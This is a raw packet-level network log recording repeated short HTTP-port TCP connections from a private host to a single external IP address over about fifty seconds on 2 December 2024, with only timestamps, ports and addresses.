Dec 2, 2024 14:46:56.975864887 CET	49785	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:57.095859051 CET	80	49785	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:57.095935106 CET	49785	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:57.098381042 CET	49785	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:57.218460083 CET	80	49785	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:57.218517065 CET	49785	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:57.338444948 CET	80	49785	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:58.470752954 CET	80	49785	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:58.470918894 CET	49785	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:58.471334934 CET	80	49785	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:58.471412897 CET	49785	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:58.591098070 CET	80	49785	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:58.617449999 CET	49790	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:58.738117933 CET	80	49790	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:58.738224983 CET	49790	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:58.740385056 CET	49790	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:58.861254930 CET	80	49790	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:58.861315012 CET	49790	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:58.981283903 CET	80	49790	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:00.150437117 CET	80	49790	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:00.150562048 CET	49790	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:00.151066065 CET	80	49790	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:00.151115894 CET	49790	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:00.270524979 CET	80	49790	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:00.288724899 CET	49796	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:00.408811092 CET	80	49796	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:00.408948898 CET	49796	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:00.411134958 CET	49796	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:00.531459093 CET	80	49796	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:00.531526089 CET	49796	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:00.651529074 CET	80	49796	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:01.846704960 CET	80	49796	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:01.846834898 CET	49796	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:01.847513914 CET	80	49796	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:01.847562075 CET	49796	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:01.967777967 CET	80	49796	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:01.995642900 CET	49800	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:02.116729021 CET	80	49800	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:02.116851091 CET	49800	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:02.118983984 CET	49800	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:02.239093065 CET	80	49800	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:02.240374088 CET	49800	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:02.360551119 CET	80	49800	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:03.581765890 CET	80	49800	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:03.581835032 CET	80	49800	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:03.581893921 CET	49800	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:03.582209110 CET	49800	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:03.701899052 CET	80	49800	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:03.746540070 CET	49803	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:03.866547108 CET	80	49803	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:03.866669893 CET	49803	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:03.868850946 CET	49803	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:03.989078999 CET	80	49803	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:03.989197016 CET	49803	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:04.109535933 CET	80	49803	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:05.298873901 CET	80	49803	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:05.298970938 CET	49803	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:05.299218893 CET	80	49803	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:05.299259901 CET	49803	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:05.418962002 CET	80	49803	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:05.456135988 CET	49809	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:05.576159000 CET	80	49809	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:05.576286077 CET	49809	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:05.578545094 CET	49809	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:05.698668003 CET	80	49809	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:05.698801994 CET	49809	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:05.818921089 CET	80	49809	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:06.890754938 CET	80	49809	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:06.891074896 CET	80	49809	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:06.891146898 CET	49809	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:06.891174078 CET	49809	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:07.011265993 CET	80	49809	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:07.041111946 CET	49815	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:07.162292004 CET	80	49815	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:07.162401915 CET	49815	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:07.164653063 CET	49815	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:07.284668922 CET	80	49815	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:07.284781933 CET	49815	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:07.404954910 CET	80	49815	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:08.562284946 CET	80	49815	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:08.562385082 CET	49815	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:08.562751055 CET	80	49815	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:08.562793970 CET	49815	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:08.682467937 CET	80	49815	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:08.711062908 CET	49818	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:08.831062078 CET	80	49818	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:08.831223011 CET	49818	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:08.833358049 CET	49818	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:08.953407049 CET	80	49818	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:08.953660965 CET	49818	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:09.073817015 CET	80	49818	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:10.201376915 CET	80	49818	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:10.201507092 CET	49818	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:10.202091932 CET	80	49818	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:10.202142954 CET	49818	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:10.321448088 CET	80	49818	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:10.352518082 CET	49822	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:10.472534895 CET	80	49822	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:10.472687006 CET	49822	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:10.474898100 CET	49822	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:10.595086098 CET	80	49822	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:10.595338106 CET	49822	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:10.715342999 CET	80	49822	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:11.854860067 CET	80	49822	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:11.855158091 CET	49822	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:11.856298923 CET	80	49822	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:11.856354952 CET	49822	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:11.975279093 CET	80	49822	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:11.996875048 CET	49828	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:12.117263079 CET	80	49828	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:12.117357969 CET	49828	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:12.119556904 CET	49828	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:12.239737988 CET	80	49828	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:12.239799976 CET	49828	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:12.359924078 CET	80	49828	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:13.502187014 CET	80	49828	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:13.503545046 CET	80	49828	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:13.503644943 CET	49828	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:13.503716946 CET	49828	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:13.623755932 CET	80	49828	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:13.652743101 CET	49834	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:13.772916079 CET	80	49834	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:13.774379969 CET	49834	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:13.776523113 CET	49834	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:13.896565914 CET	80	49834	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:13.896676064 CET	49834	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:14.016876936 CET	80	49834	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:15.090383053 CET	80	49834	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:15.090672970 CET	49834	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:15.091382027 CET	80	49834	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:15.091440916 CET	49834	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:15.210858107 CET	80	49834	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:15.229298115 CET	49836	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:15.349839926 CET	80	49836	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:15.350285053 CET	49836	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:15.352350950 CET	49836	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:15.472302914 CET	80	49836	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:15.472434998 CET	49836	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:15.594367027 CET	80	49836	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:16.779161930 CET	80	49836	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:16.779417038 CET	49836	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:16.779927969 CET	80	49836	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:16.779992104 CET	49836	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:16.899399042 CET	80	49836	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:16.929941893 CET	49841	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:17.050182104 CET	80	49841	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:17.050367117 CET	49841	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:17.052521944 CET	49841	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:17.172525883 CET	80	49841	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:17.172627926 CET	49841	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:17.292663097 CET	80	49841	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:18.363347054 CET	80	49841	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:18.363516092 CET	80	49841	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:18.363636971 CET	49841	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:18.363637924 CET	49841	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:18.483637094 CET	80	49841	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:18.520369053 CET	49847	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:18.641113043 CET	80	49847	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:18.641268969 CET	49847	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:18.643647909 CET	49847	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:18.763642073 CET	80	49847	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:18.763775110 CET	49847	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:18.883960009 CET	80	49847	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:20.000325918 CET	80	49847	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:20.000530005 CET	49847	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:20.000909090 CET	80	49847	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:20.000963926 CET	49847	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:20.120547056 CET	80	49847	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:20.147939920 CET	49850	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:20.269387007 CET	80	49850	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:20.269542933 CET	49850	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:20.271853924 CET	49850	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:20.391897917 CET	80	49850	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:20.392040014 CET	49850	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:20.512173891 CET	80	49850	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:21.625751019 CET	80	49850	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:21.625811100 CET	80	49850	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:21.625854969 CET	49850	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:21.625854969 CET	49850	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:21.745851994 CET	80	49850	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:21.775580883 CET	49854	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:21.895879984 CET	80	49854	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:21.896092892 CET	49854	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:21.898245096 CET	49854	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:22.018264055 CET	80	49854	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:22.018416882 CET	49854	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:22.138571024 CET	80	49854	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:23.338934898 CET	80	49854	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:23.339059114 CET	49854	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:23.339541912 CET	80	49854	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:23.339589119 CET	49854	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:23.459120989 CET	80	49854	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:23.654932976 CET	49860	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:23.775281906 CET	80	49860	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:23.775377035 CET	49860	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:23.779117107 CET	49860	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:23.899244070 CET	80	49860	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:23.899317980 CET	49860	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:24.019442081 CET	80	49860	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:25.118474960 CET	80	49860	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:25.118771076 CET	49860	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:25.119015932 CET	80	49860	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:25.119074106 CET	49860	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:25.238972902 CET	80	49860	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:25.274728060 CET	49867	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:25.396159887 CET	80	49867	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:25.396516085 CET	49867	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:25.398736000 CET	49867	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:25.518852949 CET	80	49867	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:25.519040108 CET	49867	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:25.639189959 CET	80	49867	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:26.735745907 CET	80	49867	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:26.735846996 CET	49867	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:26.737768888 CET	80	49867	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:26.737829924 CET	49867	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:26.855911016 CET	80	49867	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:26.882647991 CET	49871	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:27.002851963 CET	80	49871	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:27.003338099 CET	49871	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:27.005171061 CET	49871	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:27.125227928 CET	80	49871	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:27.125459909 CET	49871	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:27.245590925 CET	80	49871	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:28.364978075 CET	80	49871	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:28.365299940 CET	49871	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:28.366307020 CET	80	49871	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:28.366359949 CET	49871	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:28.485526085 CET	80	49871	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:28.508724928 CET	49875	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:28.628822088 CET	80	49875	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:28.628910065 CET	49875	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:28.631117105 CET	49875	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:28.752630949 CET	80	49875	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:28.752702951 CET	49875	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:28.872739077 CET	80	49875	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:30.056348085 CET	80	49875	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:30.056504965 CET	49875	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:30.057904959 CET	80	49875	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:30.057974100 CET	49875	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:30.176497936 CET	80	49875	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:30.198987961 CET	49882	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:30.319327116 CET	80	49882	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:30.319487095 CET	49882	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:30.321640968 CET	49882	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:30.441658020 CET	80	49882	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:30.441791058 CET	49882	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:30.561841965 CET	80	49882	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:31.749869108 CET	80	49882	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:31.750910044 CET	80	49882	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:31.751030922 CET	49882	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:31.751079082 CET	49882	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:31.871181965 CET	80	49882	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:31.898541927 CET	49887	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:32.019141912 CET	80	49887	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:32.019222975 CET	49887	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:32.021401882 CET	49887	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:32.141345978 CET	80	49887	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:32.141391993 CET	49887	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:32.261535883 CET	80	49887	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:33.456372976 CET	80	49887	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:33.456429958 CET	80	49887	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:33.456485987 CET	49887	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:33.456528902 CET	49887	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:33.576652050 CET	80	49887	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:33.615310907 CET	49891	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:33.735327005 CET	80	49891	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:33.737108946 CET	49891	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:33.739841938 CET	49891	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:33.859719038 CET	80	49891	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:33.859801054 CET	49891	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:33.979861975 CET	80	49891	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:35.118350029 CET	80	49891	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:35.118441105 CET	49891	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:35.119127989 CET	80	49891	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:35.119170904 CET	49891	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:35.238940954 CET	80	49891	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:35.258559942 CET	49895	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:35.379810095 CET	80	49895	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:35.379950047 CET	49895	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:35.382344961 CET	49895	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:35.503603935 CET	80	49895	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:35.503757954 CET	49895	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:35.624208927 CET	80	49895	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:36.699984074 CET	80	49895	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:36.700242043 CET	49895	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:36.700927019 CET	80	49895	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:36.700992107 CET	49895	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:36.820183039 CET	80	49895	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:36.853037119 CET	49900	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:36.972996950 CET	80	49900	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:36.973186016 CET	49900	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:36.975333929 CET	49900	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:37.095285892 CET	80	49900	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:37.095474005 CET	49900	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:37.396651983 CET	49900	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:37.422736883 CET	80	49900	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:37.542694092 CET	80	49900	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:38.338171005 CET	80	49900	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:38.338382959 CET	49900	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:38.339209080 CET	80	49900	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:38.339287043 CET	49900	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:38.458368063 CET	80	49900	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:38.479923010 CET	49906	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:38.600068092 CET	80	49906	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:38.600218058 CET	49906	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:38.602385998 CET	49906	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:38.724555016 CET	80	49906	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:38.724664927 CET	49906	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:38.844918966 CET	80	49906	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:40.145010948 CET	80	49906	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:40.145347118 CET	49906	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:40.145445108 CET	80	49906	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:40.145507097 CET	49906	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:40.265348911 CET	80	49906	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:40.300807953 CET	49909	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:40.420877934 CET	80	49909	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:40.421039104 CET	49909	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:40.423372030 CET	49909	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:40.543356895 CET	80	49909	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:40.543502092 CET	49909	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:40.663496971 CET	80	49909	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:41.813971996 CET	80	49909	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:41.814074993 CET	49909	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:41.815239906 CET	80	49909	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:41.815285921 CET	49909	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:41.934269905 CET	80	49909	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:41.960845947 CET	49914	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:42.080794096 CET	80	49914	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:42.080888987 CET	49914	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:42.082954884 CET	49914	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:42.202948093 CET	80	49914	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:42.203054905 CET	49914	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:42.323033094 CET	80	49914	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:43.461189032 CET	80	49914	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:43.461307049 CET	49914	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:43.462292910 CET	80	49914	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:43.462354898 CET	49914	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:43.581301928 CET	80	49914	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:43.603270054 CET	49919	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:43.723627090 CET	80	49919	104.21.57.140	192.168.2.7
